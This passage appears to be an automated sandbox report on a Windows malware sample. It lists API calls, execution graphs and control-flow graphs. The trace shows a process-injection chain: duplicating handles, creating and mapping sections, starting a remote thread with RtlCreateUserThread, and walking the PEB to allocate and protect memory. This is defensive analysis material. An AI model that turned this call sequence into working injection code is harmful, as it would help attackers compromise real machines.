                                                                                                                              • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                                                                                              APIs
                                                                                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419F54
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419F6F
                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00419F8E
                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419F9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4159173863-0
                                                                                                                              • Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction ID: 1bf496f261d44d5874548456f00747c7bc808a18a7fb14915401555e76d5e561
                                                                                                                              • Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
                                                                                                                              • Instruction Fuzzy Hash: BF018474600204EBE750EB65EC45BDA77A8E71C316F408076FA0997290DB745D88CB99
                                                                                                                              APIs
                                                                                                                              • BuildCommDCBW.KERNEL32(00000000,?), ref: 00419EB4
                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                              • String ID: -
                                                                                                                              • API String ID: 2991353152-2547889144
                                                                                                                              • Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction ID: 22d77843ece4753af1e14c452f6c8b6cfa0dc65cd9848c352101f40df5cd50f1
                                                                                                                              • Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
                                                                                                                              • Instruction Fuzzy Hash: 58F02230908305A6DB20DF98D8907EF7FA5E708322F60022AE840A62C1C7384D86D3AA

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:8.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:18.4%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:261
                                                                                                                              Total number of Limit Nodes:8
                                                                                                                              execution_graph 3732 402e40 3734 402e37 3732->3734 3735 402edf 3734->3735 3736 4018e6 3734->3736 3737 4018f5 3736->3737 3738 40192e Sleep 3737->3738 3739 401949 3738->3739 3741 40195a 3739->3741 3742 401514 3739->3742 3741->3735 3743 401524 3742->3743 3744 4015c4 NtDuplicateObject 3743->3744 3752 4016e0 3743->3752 3745 4015e1 NtCreateSection 3744->3745 3744->3752 3746 401661 NtCreateSection 3745->3746 3747 401607 NtMapViewOfSection 3745->3747 3748 40168d 3746->3748 3746->3752 3747->3746 3749 40162a NtMapViewOfSection 3747->3749 3751 401697 NtMapViewOfSection 3748->3751 3748->3752 3749->3746 3750 401648 3749->3750 3750->3746 3751->3752 3753 4016be NtMapViewOfSection 3751->3753 3752->3741 3753->3752 3871 40b000 3872 40b004 3871->3872 3875 40b03c 3872->3875 3878 40b784 RtlLeaveCriticalSection 3875->3878 3877 40b033 3878->3877 3788 41a3c0 3791 419fc0 3788->3791 3790 41a3c5 3793 419fe0 3791->3793 3792 419fe9 GetVolumeInformationA 3792->3793 3793->3792 3794 41a081 3793->3794 3795 41a1a9 3794->3795 3796 41a09a InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 3794->3796 3797 41a1b5 SetCommState 3795->3797 3803 41a1ce 3795->3803 3798 41a0de 7 API calls 3796->3798 3797->3795 3799 41a187 3798->3799 3800 41a17b ObjectPrivilegeAuditAlarmA 3798->3800 3801 41a190 WaitForSingleObject 3799->3801 3802 41a198 3799->3802 3800->3799 3801->3802 3802->3795 3804 41a296 3803->3804 3805 41a1db 9 API calls 3803->3805 3818 419c90 LocalAlloc 3804->3818 3816 41a269 3805->3816 3809 41a29b LoadLibraryA 3819 419cc0 GetModuleHandleW GetProcAddress VirtualProtect 3809->3819 3810 41a2ed 3820 419f20 3810->3820 3812 41a309 MoveFileA 3813 41a2f2 3812->3813 3813->3812 3814 41a333 InterlockedCompareExchange 3813->3814 3817 41a34d 3813->3817 3814->3813 3816->3804 3817->3790 3818->3809 3819->3810 3821 419f49 QueryDosDeviceW 3820->3821 3822 419f5a 3820->3822 3821->3822 3831 419e60 3822->3831 3825 419f75 3834 419ea0 3825->3834 3826 419f6d FreeEnvironmentStringsW 3826->3825 3829 419fa3 3829->3813 3830 419f8c HeapDestroy GetNumaProcessorNode 3830->3829 3832 419e71 FatalAppExitW GetModuleHandleA 3831->3832 3833 419e83 3831->3833 3832->3833 3833->3825 3833->3826 3835 419ebc 3834->3835 3836 419eae BuildCommDCBW 3834->3836 3837 419ecc 3835->3837 3838 419ec4 FreeEnvironmentStringsA 3835->3838 3836->3837 3840 419efd 3837->3840 3841 419e90 3837->3841 3838->3837 3840->3829 3840->3830 3844 419e10 3841->3844 3845 419e3b 3844->3845 3846 419e2c SetPriorityClass 3844->3846 3845->3837 3846->3845 4011 401542 4012 40153b 4011->4012 4013 4015c4 NtDuplicateObject 4012->4013 4021 4016e0 4012->4021 4014 4015e1 NtCreateSection 4013->4014 4013->4021 4015 401661 NtCreateSection 4014->4015 4016 401607 NtMapViewOfSection 4014->4016 4017 40168d 4015->4017 4015->4021 4016->4015 4018 40162a NtMapViewOfSection 4016->4018 4020 401697 NtMapViewOfSection 4017->4020 4017->4021 4018->4015 4019 401648 4018->4019 4019->4015 4020->4021 4022 4016be NtMapViewOfSection 4020->4022 4022->4021 4056 40b308 4057 40b374 GetConsoleOutputCP WideCharToMultiByte 4056->4057 4058 40b325 4056->4058 4060 40b39b WriteConsoleA 4057->4060 4063 40b33d 4057->4063 4059 40b333 4058->4059 4067 40b84a CreateFileA 4058->4067 4062 40b344 WriteConsoleW 4059->4062 4059->4063 4060->4063 4062->4063 4064 40b35a 4062->4064 4064->4063 4065 40b363 GetLastError 4064->4065 4065->4063 4066 40b36e 4065->4066 4066->4057 4067->4059 3879 40b20a 3880 40b20f 3879->3880 3882 40b21d 3880->3882 3883 40b7ab 3880->3883 3884 40b7b7 3883->3884 3885 40b82c __fcloseall 3884->3885 3886 40b801 RtlDeleteCriticalSection 3884->3886 3888 40b90d 3884->3888 3885->3882 3886->3884 3889 40b919 3888->3889 3890 40b92d 3889->3890 3896 40b22a 3889->3896 3890->3884 3897 40b23c 3896->3897 3898 40b25e RtlEnterCriticalSection 3896->3898 3897->3898 3899 40b244 3897->3899 3898->3899 3900 40b896 3899->3900 3901 40b8c6 __fileno __freebuf 3900->3901 3903 40b8aa 3900->3903 3901->3903 3907 40ba25 3901->3907 3904 40b981 3903->3904 3930 40b29d 3904->3930 3906 40b987 3906->3890 3908 40ba31 3907->3908 3909 40b6e4 ___lock_fhandle RtlEnterCriticalSection 3908->3909 3911 40ba39 3908->3911 3910 40baa9 3909->3910 3913 40babe 3910->3913 3915 40b989 3910->3915 3911->3903 3922 40bae8 3913->3922 3916 40b999 __commit 3915->3916 3917 40b9ef 3916->3917 3920 40b9d9 CloseHandle 3916->3920 3925 40b5e7 3917->3925 3920->3917 3921 40b9e5 GetLastError 3920->3921 3921->3917 3929 40b784 RtlLeaveCriticalSection 3922->3929 3924 40baf0 3924->3911 3926 40b649 3925->3926 3927 40b5f8 3925->3927 3926->3913 3927->3926 3928 40b643 SetStdHandle 3927->3928 3928->3926 3929->3924 3931 40b2cd RtlLeaveCriticalSection 3930->3931 3932 40b2ae 3930->3932 3931->3906 3932->3931 3933 40b2b5 3932->3933 3933->3906 3754 6c003c 3755 6c0049 3754->3755 3767 6c0e0f SetErrorMode SetErrorMode 3755->3767 3760 6c0265 3761 6c02ce VirtualProtect 3760->3761 3763 6c030b 3761->3763 3762 6c0439 VirtualFree 3766 6c04be LoadLibraryA 3762->3766 3763->3762 3765 6c08c7 3766->3765 3768 6c0223 3767->3768 3769 6c0d90 3768->3769 3770 6c0dad 3769->3770 3771 6c0dbb GetPEB 3770->3771 3772 6c0238 VirtualAlloc 3770->3772 3771->3772 3772->3760 4087 402dd0 4088 402ddc 4087->4088 4089 4018e6 8 API calls 4088->4089 4090 402edf 4088->4090 4089->4090 3934 40b011 3935 40b016 3934->3935 3936 40b03c RtlLeaveCriticalSection 3935->3936 3937 40b033 3936->3937 4074 401915 4075 40191a 4074->4075 4076 4018c6 4074->4076 4077 40192e Sleep 4075->4077 4078 401949 4077->4078 4079 401514 7 API calls 4078->4079 4080 40195a 4078->4080 4079->4080 3847 402f97 3848 4030ee 3847->3848 3849 402fc1 3847->3849 3849->3848 3850 40307c RtlCreateUserThread NtTerminateProcess 3849->3850 3850->3848 3976 419ed6 3977 419ee0 3976->3977 3978 419e90 SetPriorityClass 3977->3978 3979 419efd 3977->3979 3978->3977 3980 40b2d9 3981 40b2e9 3980->3981 3982 40b2fc RtlLeaveCriticalSection 3980->3982 4047 40b562 4048 40b580 __commit 4047->4048 4049 40b599 SetFilePointer 4048->4049 4051 40b588 4048->4051 4050 40b5b1 GetLastError 4049->4050 4049->4051 4050->4051 3983 40b4e4 3986 40b3cd 3983->3986 3987 40b3e0 3986->3987 3991 40b3e9 3986->3991 3988 40b440 3987->3988 3989 40b4bd MultiByteToWideChar 3987->3989 3987->3991 3990 40b453 MultiByteToWideChar 3988->3990 3988->3991 3989->3991 3990->3991 3942 6c0005 3947 6c092b GetPEB 3942->3947 3944 6c0030 3949 6c003c 3944->3949 3948 6c0972 3947->3948 3948->3944 3950 6c0049 3949->3950 3951 6c0e0f 2 API calls 3950->3951 3952 6c0223 3951->3952 3953 6c0d90 GetPEB 3952->3953 3954 6c0238 VirtualAlloc 3953->3954 3955 6c0265 3954->3955 3956 6c02ce VirtualProtect 3955->3956 3958 6c030b 3956->3958 3957 6c0439 VirtualFree 3961 6c04be LoadLibraryA 3957->3961 3958->3957 3960 6c08c7 3961->3960 3851 40b26b 3852 40b278 3851->3852 3853 40b28e RtlEnterCriticalSection 3851->3853 3966 6c0001 3967 6c0005 3966->3967 3968 6c092b GetPEB 3967->3968 3969 6c0030 3968->3969 3970 6c003c 7 API calls 3969->3970 3971 6c0038 3970->3971 3773 6f041e 3774 6f042d 3773->3774 3777 6f0bbe 3774->3777 3783 6f0bd9 3777->3783 3778 6f0be2 CreateToolhelp32Snapshot 3779 6f0bfe Module32First 3778->3779 3778->3783 3780 6f0c0d 3779->3780 3782 6f0436 3779->3782 3784 6f087d 3780->3784 3783->3778 3783->3779 3785 6f08a8 3784->3785 3786 6f08b9 VirtualAlloc 3785->3786 3787 6f08f1 3785->3787 3786->3787 3992 4018f1 3993 4018f6 3992->3993 3994 40192e Sleep 3993->3994 3995 401949 3994->3995 3996 401514 7 API calls 3995->3996 3997 40195a 3995->3997 3996->3997 3854 40b078 3855 40b084 3854->3855 3858 40b08c 3855->3858 3863 40b6e4 3855->3863 3857 40b0ed __commit 3859 40b102 FlushFileBuffers 3857->3859 3860 40b119 3857->3860 3859->3860 3861 40b10e GetLastError 3859->3861 3867 40b14f 3860->3867 3861->3860 3866 40b6f0 ___lock_fhandle 3863->3866 3864 40b750 RtlEnterCriticalSection 3865 40b76d 3864->3865 3865->3857 3866->3864 3866->3865 3870 40b784 RtlLeaveCriticalSection 3867->3870 3869 40b157 3869->3858 3870->3869 4052 402d7b 4053 402d38 4052->4053 4053->4052 4054 402dc7 4053->4054 4055 4018e6 8 API calls 4053->4055 4055->4054 3998 4014fe 3999 401506 3998->3999 4000 401531 3998->4000 4001 4015c4 NtDuplicateObject 4000->4001 4009 4016e0 4000->4009 4002 4015e1 NtCreateSection 4001->4002 4001->4009 4003 401661 NtCreateSection 4002->4003 4004 401607 NtMapViewOfSection 4002->4004 4005 40168d 4003->4005 4003->4009 4004->4003 4006 40162a NtMapViewOfSection 4004->4006 4008 401697 NtMapViewOfSection 4005->4008 4005->4009 4006->4003 4007 401648 4006->4007 4007->4003 4008->4009 4010 4016be NtMapViewOfSection 4008->4010 4010->4009

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 419fc0-419fde 1 419fe0-419fe7 0->1 2 41a015-41a01b 1->2 3 419fe9-41a00f GetVolumeInformationA 1->3 4 41a01d-41a029 2->4 5 41a02f-41a039 2->5 3->2 4->5 6 41a074-41a07b 5->6 7 41a03b-41a06a 5->7 6->1 8 41a081-41a094 6->8 7->6 10 41a1a9-41a1af 8->10 11 41a09a-41a179 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileW CreatePipe GetEnvironmentStrings WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 8->11 12 41a1b5-41a1c3 SetCommState 10->12 14 41a187-41a18e 11->14 15 41a17b-41a181 ObjectPrivilegeAuditAlarmA 11->15 19 41a1c5-41a1cc 12->19 20 41a1ce-41a1d5 12->20 17 41a190-41a192 WaitForSingleObject 14->17 18 41a198-41a1a6 14->18 15->14 17->18 18->10 19->12 19->20 21 41a296-41a2a5 call 419c90 20->21 22 41a1db-41a290 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameA GetCommTimeouts 20->22 27 41a2a7-41a2b8 21->27 28 41a2dd-41a2e8 LoadLibraryA call 419cc0 21->28 22->21 30 41a2c0-41a2d0 27->30 35 41a2ed-41a2fe call 419f20 28->35 33 41a2d2 30->33 34 41a2d8-41a2db 30->34 33->34 34->28 34->30 40 41a300-41a307 35->40 41 41a309-41a317 MoveFileA 40->41 42 41a31d-41a323 40->42 41->42 43 41a325 call 419cb0 42->43 44 41a32a-41a331 42->44 43->44 47 41a333-41a33e InterlockedCompareExchange 44->47 48 41a344-41a34b 44->48 47->48 48->40 50 41a34d-41a35d 48->50 53 41a360-41a370 50->53 54 41a372 53->54 55 41a379-41a37c 53->55 54->55 55->53 57 41a37e-41a389 55->57 58 41a390-41a395 57->58 59 41a397-41a39d 58->59 60 41a39f-41a3a5 58->60 59->60 61 41a3a7-41a3b4 59->61 60->58 60->61
                                                                                                                              APIs
                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0041A00F
                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041A0A3
                                                                                                                              • GetFocus.USER32 ref: 0041A0A9
                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A0B4
                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 0041A0BB
                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A0C3
                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0041A0EA
                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0041A0F3
                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 0041A109
                                                                                                                              • GetEnvironmentStrings.KERNEL32 ref: 0041A10F
                                                                                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041A154
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041A163
                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0041A16C
                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A181
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041A192
                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 0041A1B9
                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0041A1EA
                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041A1FE
                                                                                                                              • CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 0041A20F
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0041A216
                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 0041A21C
                                                                                                                              • GetBinaryType.KERNEL32(0041C400,?), ref: 0041A22E
                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A241
                                                                                                                              • GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A254
                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A25C
                                                                                                                              • LoadLibraryA.KERNELBASE(0041C424), ref: 0041A2E2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
                                                                                                                              • String ID: k`$}$
                                                                                                                              • API String ID: 4249349521-956986773
                                                                                                                              • Opcode ID: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
                                                                                                                              • Instruction ID: 4f0dc8ef0138a425de16278279ab74f02fd967f86d49b53b2b7e7158032d42a8
                                                                                                                              • Opcode Fuzzy Hash: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
                                                                                                                              • Instruction Fuzzy Hash: ABA19F71802524ABD725EB61DC48FDF7B78EF49311F00816AF619A2161DB381A85CFEE

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 148 401514-401533 150 401524-40152f 148->150 151 401536-40156e call 401193 148->151 150->151 160 401570 151->160 161 401573-401578 151->161 160->161 163 401898-4018a0 161->163 164 40157e-40158f 161->164 163->161 167 401595-4015be 164->167 168 401896-4018a5 164->168 167->168 178 4015c4-4015db NtDuplicateObject 167->178 171 4018b4 168->171 172 4018ab-4018b0 168->172 171->172 173 4018b7 171->173 172->173 174 4018c5 173->174 175 4018bc-4018e3 call 401193 173->175 174->175 178->168 180 4015e1-401605 NtCreateSection 178->180 182 401661-401687 NtCreateSection 180->182 183 401607-401628 NtMapViewOfSection 180->183 182->168 184 40168d-401691 182->184 183->182 186 40162a-401646 NtMapViewOfSection 183->186 184->168 188 401697-4016b8 NtMapViewOfSection 184->188 186->182 187 401648-40165e 186->187 187->182 188->168 190 4016be-4016da NtMapViewOfSection 188->190 190->168 193 4016e0 call 4016e5 190->193
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 195 4014fe-401503 196 401531-40156e call 401193 195->196 197 401506-401511 195->197 207 401570 196->207 208 401573-401578 196->208 207->208 210 401898-4018a0 208->210 211 40157e-40158f 208->211 210->208 214 401595-4015be 211->214 215 401896-4018a5 211->215 214->215 225 4015c4-4015db NtDuplicateObject 214->225 218 4018b4 215->218 219 4018ab-4018b0 215->219 218->219 220 4018b7 218->220 219->220 221 4018c5 220->221 222 4018bc-4018e3 call 401193 220->222 221->222 225->215 227 4015e1-401605 NtCreateSection 225->227 229 401661-401687 NtCreateSection 227->229 230 401607-401628 NtMapViewOfSection 227->230 229->215 231 40168d-401691 229->231 230->229 233 40162a-401646 NtMapViewOfSection 230->233 231->215 235 401697-4016b8 NtMapViewOfSection 231->235 233->229 234 401648-40165e 233->234 234->229 235->215 237 4016be-4016da NtMapViewOfSection 235->237 237->215 240 4016e0 call 4016e5 237->240
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1652636561-0
                                                                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 242 401542-40156e call 401193 251 401570 242->251 252 401573-401578 242->252 251->252 254 401898-4018a0 252->254 255 40157e-40158f 252->255 254->252 258 401595-4015be 255->258 259 401896-4018a5 255->259 258->259 269 4015c4-4015db NtDuplicateObject 258->269 262 4018b4 259->262 263 4018ab-4018b0 259->263 262->263 264 4018b7 262->264 263->264 265 4018c5 264->265 266 4018bc-4018e3 call 401193 264->266 265->266 269->259 271 4015e1-401605 NtCreateSection 269->271 273 401661-401687 NtCreateSection 271->273 274 401607-401628 NtMapViewOfSection 271->274 273->259 275 40168d-401691 273->275 274->273 277 40162a-401646 NtMapViewOfSection 274->277 275->259 279 401697-4016b8 NtMapViewOfSection 275->279 277->273 278 401648-40165e 277->278 278->273 279->259 281 4016be-4016da NtMapViewOfSection 279->281 281->259 284 4016e0 call 4016e5 281->284
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 286 401549-40156e call 401193 290 401570 286->290 291 401573-401578 286->291 290->291 293 401898-4018a0 291->293 294 40157e-40158f 291->294 293->291 297 401595-4015be 294->297 298 401896-4018a5 294->298 297->298 308 4015c4-4015db NtDuplicateObject 297->308 301 4018b4 298->301 302 4018ab-4018b0 298->302 301->302 303 4018b7 301->303 302->303 304 4018c5 303->304 305 4018bc-4018e3 call 401193 303->305 304->305 308->298 310 4015e1-401605 NtCreateSection 308->310 312 401661-401687 NtCreateSection 310->312 313 401607-401628 NtMapViewOfSection 310->313 312->298 314 40168d-401691 312->314 313->312 316 40162a-401646 NtMapViewOfSection 313->316 314->298 318 401697-4016b8 NtMapViewOfSection 314->318 316->312 317 401648-40165e 316->317 317->312 318->298 320 4016be-4016da NtMapViewOfSection 318->320 320->298 323 4016e0 call 4016e5 320->323
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
